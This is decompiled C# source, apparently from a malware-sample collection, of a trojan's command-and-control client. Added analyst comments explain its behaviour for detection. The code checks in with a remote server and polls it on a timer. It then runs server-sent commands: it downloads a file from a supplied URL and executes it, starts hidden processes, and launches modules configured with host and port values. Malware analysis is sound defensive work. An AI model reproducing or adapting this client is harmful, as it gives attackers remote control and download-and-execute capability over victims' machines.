MalwareSourceCode/MSIL/Trojan-Ransom/Win32/B/Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570/c9b81b1a3e4ee51d08f5de2448e459036.cs

// Decompiled with JetBrains decompiler
// Type: A.c9b81b1a3e4ee51d08f5de2448e459036
// Assembly: Sharl, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: F11368F2-49D5-4A01-9284-978C5FDD6F03
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Ransom.Win32.Blocker.hejd-d602e69d871803e54a9edd4b87d241c904ab59014cfd496853fc6cc688c16570.exe
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Text;
using System.Threading;
namespace A
{
// Analyst summary (decompiled, identifiers obfuscated): this class is the sample's
// command-and-control (C2) client. It performs a blocking check-in over HTTP, then polls
// the same URL on a fixed interval and dispatches '*'-delimited commands.
// Names of the form c25810...c67f77...(int) are presumably the obfuscator's string-lookup
// helper; the decoded literals are not visible in this file, so their values are not stated.
// c57ac7...c5a948... appears to be a static configuration holder (URL, tokens, interval),
// judging only from how its members are used below.
// Behaviours visible here that are useful for detection: fixed-interval HTTP requests with a
// configured User-Agent, a downloaded file written under a directory taken from an
// environment variable and then started, and a child process started with a hidden window.
internal class c9b81b1a3e4ee51d08f5de2448e459036
{
// Last non-empty server response handed to the dispatcher. The poll loop compares each new
// response against it so an unchanged command is not dispatched twice; it is reset to
// string.Empty when the server returns an empty body.
private string c749d615fce46a65e549ecd0269efb309 = string.Empty;
// Entry point of the C2 client. The check-in call is synchronous, so the polling thread is
// only started once the check-in loop has exited normally.
public void ccca4f7e07f327977d582f4cecb7af4cd()
{
this.c70c0917b5d671ac9ae9d4e7f861b66d0();
new Thread(new ThreadStart(this.ca33aa6acdace65e5414a966dd1dc03ae)).Start();
}
// Check-in loop. Builds a request body from four decoded fragments interleaved with four
// configuration values and sends it until the server answers.
// - empty response or any exception: sleep, then retry (exceptions are silently swallowed)
// - response equal to the configured token: leave the loop
// - any other non-empty response: terminate the process with exit code -1
// The accepted token is the same configuration member that the HTTP helper sends as the
// User-Agent header, i.e. the server is expected to echo that value back.
private void c70c0917b5d671ac9ae9d4e7f861b66d0()
{
// Body layout: fragment(1377) + value + fragment(1402) + value + fragment(1419) + value + fragment(1436) + value.
// NOTE(review): looks like form-style "key=value" pairs describing the host - confirm against the decoded strings.
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1377) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1402) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cdd86f79582ee69b3331f0a01a8458c64 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1419) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c08c5101a594b5e3a22d4e523b7baa2b1 + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1436) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c8d4d9680af49d6d5dcc86b05695287f2;
while (true)
{
try
{
// First argument is the configured C2 URL (it is passed to WebRequest.Create in the helper).
string str = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
if (str.Length > 0)
{
if (str == c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b)
break;
// Unexpected reply: the sample exits instead of continuing.
Environment.Exit(-1);
}
}
catch
{
}
// The configured value is multiplied by 60 * 1000 ms, so it is interpreted as minutes between requests.
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
}
}
// Command poll loop; runs forever on its own thread. Each iteration sends fragment(1453) plus
// one configuration value (the first of the four values also sent at check-in) to the C2 URL
// and then sleeps for the configured number of minutes.
private void ca33aa6acdace65e5414a966dd1dc03ae()
{
string c2cbf7d2e1f35e8102d156c340d5f99cb = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1453) + c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.c5c0d142f43b2ed4000991109cbc0575f;
while (true)
{
try
{
string ce500fea65ca5a93a477a5ab3b4c7f34d = this.c372676659fe6f48f27b1ad11ccb40951(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.ce6b1c08295456824d707adffcd771c22, c2cbf7d2e1f35e8102d156c340d5f99cb);
if (ce500fea65ca5a93a477a5ab3b4c7f34d.Length > 0)
{
// Only a response that differs from the previous one is dispatched.
if (ce500fea65ca5a93a477a5ab3b4c7f34d != this.c749d615fce46a65e549ecd0269efb309)
{
// If the dispatcher throws (commands 6 and 7 are not wrapped in try/catch), the assignment
// below is skipped, so the same response is dispatched again on the next poll.
this.c92d05caa41a6d8d9718da94fb32596c8(ce500fea65ca5a93a477a5ab3b4c7f34d);
this.c749d615fce46a65e549ecd0269efb309 = ce500fea65ca5a93a477a5ab3b4c7f34d;
}
}
else
{
// Empty response: one static method is called on each of the four classes that commands
// 0-3 configure and start. Presumably these are the matching "stop" routines - the classes
// are defined elsewhere, so confirm there. Each call is isolated so one failure does not
// prevent the others.
try
{
c2b32128b27710d76674c1117f7f19ccf.c90f6d098ad5ce70814005fb0adf72870();
}
catch
{
}
try
{
c986963ced362383f6d7b6341e31dcfe7.c451004db98e7b627d5ee87fe743cb383();
}
catch
{
}
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c4f970d2f71876e66d1daba6a51237e62();
}
catch
{
}
try
{
cb7379333abfa1ab1cb35304f3a8573ec.cc3c1bbd84093cbd7bdc83bcc5fb3ac15();
}
catch
{
}
// Forget the last command so that the same command string is accepted again later.
this.c749d615fce46a65e549ecd0269efb309 = string.Empty;
}
}
catch
{
}
Thread.Sleep(c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cddb71d8bcf007ee24cca0a5fc8c9f9d1 * 60 * 1000);
}
}
// HTTP helper: sends the given body to the given URL and returns the trimmed response text,
// or string.Empty when GetResponse returns null.
// First parameter: request URL. Second parameter: request body, encoded as ASCII.
// Content type and method come from decoded strings (1478, 1545); the method is presumably
// POST, since a request body is written. The User-Agent is a configured value.
// Exceptions are not handled here; both callers swallow them.
// The response, its stream and the reader are never closed or disposed in this method.
private string c372676659fe6f48f27b1ad11ccb40951(
string cf7d7ab02f04f36e1e7781d49924e7769,
string c2cbf7d2e1f35e8102d156c340d5f99cb)
{
// Static setting on ServicePointManager, so it is not limited to this one request.
ServicePointManager.Expect100Continue = false;
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(cf7d7ab02f04f36e1e7781d49924e7769);
httpWebRequest.ContentType = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1478);
httpWebRequest.Method = c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1545);
httpWebRequest.UserAgent = c57ac7140997a29abffbea04a04f33fc6.c5a948dc66b99c61ab7c2f0ddb4575bab.cf878f08181d5af12c924fb92b523534b;
byte[] bytes = Encoding.ASCII.GetBytes(c2cbf7d2e1f35e8102d156c340d5f99cb);
httpWebRequest.ContentLength = (long) bytes.Length;
Stream requestStream = httpWebRequest.GetRequestStream();
requestStream.Write(bytes, 0, bytes.Length);
requestStream.Close();
WebResponse response = httpWebRequest.GetResponse();
return response == null ? string.Empty : new StreamReader(response.GetResponseStream()).ReadToEnd().Trim();
}
// Command dispatcher. The response is split on '*'; field 0 is the command name and the
// remaining fields are its arguments. Unknown command names are ignored.
// Every argument comes straight from the server response; no validation other than numeric
// parsing is visible in this method.
// Commands 0-5 swallow all exceptions (including a missing argument); commands 6 and 7 do
// not, so their exceptions propagate to the caller.
private void c92d05caa41a6d8d9718da94fb32596c8(string ce500fea65ca5a93a477a5ab3b4c7f34d)
{
string[] strArray = new string[0];
try
{
strArray = ce500fea65ca5a93a477a5ab3b4c7f34d.Split('*');
}
catch
{
}
string key;
if ((key = strArray[0]) == null)
return;
// The lazily-built Dictionary<string, int> plus the switch below is the usual compiled form
// of a C# switch over strings; the eight command names are decoded strings 1554-1667.
// ISSUE: reference to a compiler-generated field
if (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc == null)
{
// ISSUE: reference to a compiler-generated field
c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc = new Dictionary<string, int>(8)
{
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1554),
0
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1571),
1
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1590),
2
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1607),
3
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1626),
4
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1643),
5
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1654),
6
},
{
c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1667),
7
}
};
}
int num;
// ISSUE: reference to a compiler-generated field
// ISSUE: explicit non-virtual call
if (!__nonvirtual (c7bada025401008fe87db7163fb8faf48.c139b1fcd81f6e8b23501dbbfe6bf01fc.TryGetValue(key, out num)))
return;
switch (num)
{
// Commands 0-3: copy server-supplied arguments into static fields of a module class and call
// its start method. The module classes are defined elsewhere; what they do cannot be told
// from this file. Field types seen here: a string, a ushort (presumably a port - confirm)
// and ints.
case 0:
try
{
c2b32128b27710d76674c1117f7f19ccf.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
c2b32128b27710d76674c1117f7f19ccf.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
c2b32128b27710d76674c1117f7f19ccf.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
c2b32128b27710d76674c1117f7f19ccf.c52cb3c9fa9ea96db544af1bec7b932c8 = Convert.ToInt32(strArray[4]);
c2b32128b27710d76674c1117f7f19ccf.c68372a86611194582de7bf4f45c72f47();
break;
}
catch
{
break;
}
case 1:
try
{
c986963ced362383f6d7b6341e31dcfe7.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
c986963ced362383f6d7b6341e31dcfe7.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[2]);
c986963ced362383f6d7b6341e31dcfe7.cef8e53905308fbf449ffc06b3aecf429();
break;
}
catch
{
break;
}
case 2:
try
{
ca2a3d5a1b8d431c404c11a5f27d5064a.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
ca2a3d5a1b8d431c404c11a5f27d5064a.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
ca2a3d5a1b8d431c404c11a5f27d5064a.ce1f122b7ea8865781912d724c92b0e28 = Convert.ToInt32(strArray[4]);
ca2a3d5a1b8d431c404c11a5f27d5064a.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
ca2a3d5a1b8d431c404c11a5f27d5064a.c1e47aee5510fe6af6ef6c306b4a8c34a();
break;
}
catch
{
break;
}
case 3:
try
{
cb7379333abfa1ab1cb35304f3a8573ec.c966ab90271ad8729ab4aa4181c310abf = Convert.ToString(strArray[1]);
cb7379333abfa1ab1cb35304f3a8573ec.cf7dbbb0d9526e45865da4ee3fb9e1488 = ushort.Parse(strArray[2]);
cb7379333abfa1ab1cb35304f3a8573ec.c1e5fb6eadf8fa36fbb78b515080241e1 = Convert.ToInt32(strArray[3]);
cb7379333abfa1ab1cb35304f3a8573ec.cf0383b25e10d922cf775f947a9893ddb = Convert.ToInt32(strArray[4]);
cb7379333abfa1ab1cb35304f3a8573ec.cced20ebbb17c5b4c22dbd925be9f7bd0 = Convert.ToInt32(strArray[5]);
cb7379333abfa1ab1cb35304f3a8573ec.cd351d92ca1a938962136bd5808af7e90();
break;
}
catch
{
break;
}
// Command 4: download and run. The file at the server-supplied URL (field 1) is saved as
// <environment variable named by string 1689> + string 340 + <helper output for a random
// int in 5..11> + string 1680, and that path is then started as a process.
// Presumably a temp directory, a path separator, a random file name and an extension -
// confirm against the decoded strings. No integrity or signature check on the downloaded
// file is visible before it is started.
case 4:
try
{
string str = c57ac7140997a29abffbea04a04f33fc6.c4a101047227d6769ba130216f202ea07.c4028bc68211f16a03921654b4b8b346f(new Random().Next(5, 12)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1680);
new WebClient().DownloadFile(Convert.ToString(strArray[1]), Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str);
new Process()
{
StartInfo = {
FileName = (Environment.GetEnvironmentVariable(c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1689)) + c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(340) + str)
}
}.Start();
break;
}
catch
{
break;
}
// Command 5: start the server-supplied file name (field 1) as a process with its window hidden.
case 5:
try
{
Process process = new Process()
{
StartInfo = new ProcessStartInfo(Convert.ToString(strArray[1]))
};
process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
process.Start();
break;
}
catch
{
break;
}
// Command 6: passes field 1 to a helper defined elsewhere; its effect is not visible here.
case 6:
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.c32ad199a1a1b21b2f3794ba8b7927c6b(Convert.ToString(strArray[1]));
break;
// Command 7: runs a helper defined elsewhere only when field 1 equals this machine's name
// or, upper-cased, equals decoded string 1698 (presumably a wildcard meaning "every host" -
// confirm). The helper's effect is not visible here.
case 7:
if (!(strArray[1] == Environment.MachineName) && !(strArray[1].ToUpper() == c25810691943c3772c89bee5b3c190ee0.c67f77785e5df280621394f94fff2ffdf(1698)))
break;
c57ac7140997a29abffbea04a04f33fc6.cb5ecebe7cbd234304d7228da096a3fa0.ceaf8f38b42d6fe6312cc350ddb4ba0d6();
break;
}
}
}
}